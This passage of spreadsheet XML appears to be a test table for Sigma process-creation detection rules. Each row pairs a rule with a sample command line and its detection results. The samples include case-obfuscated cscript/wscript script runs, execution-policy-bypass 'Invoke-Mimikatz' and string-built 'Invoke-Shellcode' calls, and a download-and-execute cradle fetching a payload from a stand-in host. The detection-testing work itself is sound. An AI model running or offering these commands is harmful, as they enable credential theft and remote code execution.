      <c r="J2646" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2646" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2647" ht="15.75" customHeight="1" s="42">
      <c r="A2647" s="44" t="n"/>
      <c r="B2647" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2647" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2647" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2647" s="44" t="inlineStr">
        <is>
          <t>cscript.exe /"/E:vbs" C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2647" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2647" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2647" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2647" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2647" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2648" ht="15.75" customHeight="1" s="42">
      <c r="A2648" s="44" t="n"/>
      <c r="B2648" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2648" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2648" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2648" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //e:vBS C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2648" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2648" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2648" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2648" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2648" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2649" ht="15.75" customHeight="1" s="42">
      <c r="A2649" s="44" t="n"/>
      <c r="B2649" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2649" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2649" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2649" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //E:vBs C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2649" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2649" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2649" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2649" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2649" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2650" ht="15.75" customHeight="1" s="42">
      <c r="A2650" s="44" t="n"/>
      <c r="B2650" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2650" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2650" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2650" s="44" t="inlineStr">
        <is>
          <t>cscript.exe //e:Vbs C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2650" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2650" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2650" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2650" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2650" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2651" ht="15.75" customHeight="1" s="42">
      <c r="A2651" s="44" t="n"/>
      <c r="B2651" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2651" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2651" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2651" s="44" t="inlineStr">
        <is>
          <t>cscript.exe -"/E:vbs" C:\Users\Public\update.log</t>
        </is>
      </c>
      <c r="F2651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2651" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba)</t>
        </is>
      </c>
      <c r="J2651" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2651" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2652" ht="15.75" customHeight="1" s="42">
      <c r="A2652" s="44" t="n"/>
      <c r="B2652" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2652" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2652" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2652" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:jscript C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2652" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2652" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2652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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2652" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2653" ht="15.75" customHeight="1" s="42">
      <c r="A2653" s="44" t="n"/>
      <c r="B2653" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2653" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2653" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2653" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //e:jScripT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2653" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2653" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2653" s="44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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2653" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2654" ht="15.75" customHeight="1" s="42">
      <c r="A2654" s="44" t="n"/>
      <c r="B2654" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2654" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2654" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2654" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:JsCRIPT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2654" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2654" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2654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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2654" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2655" ht="15.75" customHeight="1" s="42">
      <c r="A2655" s="44" t="n"/>
      <c r="B2655" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2655" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2655" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2655" s="44" t="inlineStr">
        <is>
          <t>wscript.exe /"/E:jscript" C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2655" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2655" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2655" s="43" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33)</t>
        </is>
      </c>
      <c r="J2655" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2655" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2656" ht="15.75" customHeight="1" s="42">
      <c r="A2656" s="44" t="n"/>
      <c r="B2656" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2656" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2656" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2656" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:jsCRIPT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2656" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2656" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2656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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2656" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2657" ht="15.75" customHeight="1" s="42">
      <c r="A2657" s="44" t="n"/>
      <c r="B2657" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2657" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2657" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2657" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:JscRiPT C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2657" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2657" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2657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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2657" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2658" ht="15.75" customHeight="1" s="42">
      <c r="A2658" s="44" t="n"/>
      <c r="B2658" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2658" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2658" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2658" s="44" t="inlineStr">
        <is>
          <t>wscript.exe //E:JscrIPt C:\Windows\Temp\hidden_script</t>
        </is>
      </c>
      <c r="F2658" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2658" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2658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</t>
        </is>
      </c>
      <c r="J2658" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2658" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2659" ht="15.75" customHeight="1" s="42">
      <c r="A2659" s="44" t="n"/>
      <c r="B2659" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wscript_cscript_uncommon_extension_exec</t>
        </is>
      </c>
      <c r="C2659" s="44" t="inlineStr">
        <is>
          <t>Cscript/Wscript Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D2659" s="44" t="inlineStr">
        <is>
          <t>99b7460d-c9f1-40d7-a316-1f36f61d52ee</t>
        </is>
      </c>
      <c r="E2659" s="44" t="inlineStr">
        <is>
          <t>wscript.exe "C:\Users\Public\payload.vbs"</t>
        </is>
      </c>
      <c r="F2659" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2659" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2659" s="44" t="inlineStr">
        <is>
          <t>Script Interpreter Execution From Suspicious Folder (1228c958-e64e-4e71-92ad-7d429f4138ba); Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J2659" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2659" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2660" ht="15.75" customHeight="1" s="42">
      <c r="A2660" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2660" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2660" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2660" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2660" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2660" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2660" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2660" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2660" s="44" t="n"/>
      <c r="J2660" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2660" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2661" ht="15.75" customHeight="1" s="42">
      <c r="A2661" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2661" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2661" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2661" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2661" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2661" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2661" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2661" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2661" s="44" t="n"/>
      <c r="J2661" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2661" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2662" ht="15.75" customHeight="1" s="42">
      <c r="A2662" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2662" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2662" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2662" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2662" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2662" s="44" t="n"/>
      <c r="J2662" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2662" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2663" ht="15.75" customHeight="1" s="42">
      <c r="A2663" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2663" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2663" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2663" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2663" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2663" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266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663" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2663" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2664" ht="15.75" customHeight="1" s="42">
      <c r="A2664" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2664" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2664" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2664" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2664" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2664" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266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664" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2664" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2665" ht="15.75" customHeight="1" s="42">
      <c r="A2665" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2665" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2665" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2665" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2665" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2665" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26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665" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2665" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2666" ht="15.75" customHeight="1" s="42">
      <c r="A2666" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2666" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2666" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2666" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2666" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2666" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266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666" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2666" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2667" ht="15.75" customHeight="1" s="42">
      <c r="A2667" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2667" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2667" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2667" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2667" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2667" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266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667" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2667" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2668" ht="15.75" customHeight="1" s="42">
      <c r="A2668" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2668" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2668" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2668" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2668" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2668" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2668" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266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668" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2668" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2669" ht="15.75" customHeight="1" s="42">
      <c r="A2669" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2669" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2669" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2669" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2669" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2669" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2669" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I266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669" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2669" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2670" ht="15.75" customHeight="1" s="42">
      <c r="A2670" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2670" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2670" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2670" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2670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670" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2670" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2670" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2670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670" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2670" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2671" ht="15.75" customHeight="1" s="42">
      <c r="A2671" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2671" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2671" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2671" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2671" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F2671" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2671" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2671" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2671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671" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2671" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2672" ht="15.75" customHeight="1" s="42">
      <c r="A2672" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2672" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2672" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2672" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2672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672" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2672" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2672" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2672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672" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2672" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2673" ht="15.75" customHeight="1" s="42">
      <c r="A2673" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2673" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2673" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2673" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2673" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2673" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2673" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2673" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2673" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2673" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2673" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2674" ht="15.75" customHeight="1" s="42">
      <c r="A2674" s="44" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B2674" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2674" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2674" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
